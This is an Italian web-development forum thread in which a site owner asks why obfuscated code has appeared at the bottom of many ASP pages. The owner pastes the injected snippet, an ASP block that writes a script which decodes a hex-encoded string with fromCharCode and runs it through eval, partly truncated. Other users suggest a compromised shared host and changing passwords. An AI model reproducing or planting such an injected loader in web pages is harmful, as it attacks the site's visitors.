Visualizzazione dei risultati da 1 a 6 su 6
  1. #1
    Utente di HTML.it
    Registrato dal
    May 2004
    Messaggi
    55

    Codice Malevolo nella Pagine

    Salve a tutti,

    da poco è capitato che nelle pagine di un sito sviluppato in ASP sia stato inserito (non capisco come) del codice "intruso".

    Il codice compare in fondo a numerose pagine del sito come se si fosse propagato (navigando anche le sottocartelle).

    Riporto il codice in fondo alla pagina (ho eliminato parte dei numeri esadecimali per brevità)

    Da cosa può dipendere e come può essere evitato? Qualcuno ha sperimentato casi analoghi?

    Help!




    codice:
                                                                                                                                                                                                                                                              <%
    fg09 = “                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          sp=\"split\";w=window;aq=\"0\"+\"x\";ff=String;z=\"y\";ff=ff.fromCharCode;try{document[\"\x62od\"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w[\"eval\"];if(1){f=\"17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,70,5b,64,65,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d.......,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1\"[sp](\",\");}w=f;s=[];for(i=2-2;-i+1337!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}</script>";
    Response.Write(fg09);
    %>
    <%=fg09%>

  2. #2
    Per favore, la prossima volta inserisci il codice negli opportuni tag [CODE] perché così sfonda la pagina.

    A me era capitato, non con ASP ma con Joomla (e quindi PHP).
    All'epoca usavo la versione 1 e il sito ci metteva una vita ad aprire ogni pagina a causa di quel codice (differente da quello che hai postato, molto più incomprensibile). Sui forum mi dicevano che il problema era perché la versione di Joomla era troppo vecchia (c'era già la 1.5), quindi dovevo aggiornarla subito per risolvere.
    Aggiornato alla versione 1.5 il problema si è ripresentato poco dopo (quindi che c'entrava la versione? )

    Piacerebbe sapere anche a me come è possibile che possa capitare qualcosa del genere.

  3. #3
    Moderatore di Annunci siti web, Offro lavoro/collaborazione, Cerco lavoro L'avatar di cavicchiandrea
    Registrato dal
    Aug 2001
    Messaggi
    26,133
    Probabilmente hanno "bucato" il server se sei su hosting condiviso contatta il provider, se hai un server tuo contatta un sistemista che sistemerà Firewalls e antivirus
    Cavicchi Andrea
    Problemi con javascript, jquery, ajax clicca qui

  4. #4
    Utente di HTML.it
    Registrato dal
    May 2004
    Messaggi
    55
    Ok per il tag [CODE]!

    LEggendo in rete ho trovato qualcosa sul CODE INJECTION ma non sono riuscito a scoprire molto. Non per ASP per lo meno.

    Al momento vorrei capire se è un problema del sito (eventuali vulnerabilità delle pagine) oppure se può essere dovuto ad un problema dell'hosting.

    Mi hanno confermato che non ci sono stati accessi FTP alle pagine.


    Continuando l'analisi dei files vedo che si sono modificati molti files .ASP , .HTML e HTM..

  5. #5
    se sei in hosting condiviso, non è necessario l'accesso FTP alle tue pagine. basta che sia infettato uno dei millemila siti che sono su quell'hosting che l'infezione si propaga anche a tutti gli altri siti ospitati sul server

  6. #6
    Utente di HTML.it
    Registrato dal
    May 2004
    Messaggi
    55
    Ah potrebbe essere andata così..
    Nel frattempo faccio cambiare tutte le password, ftp e dei pannelli web del sito..

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.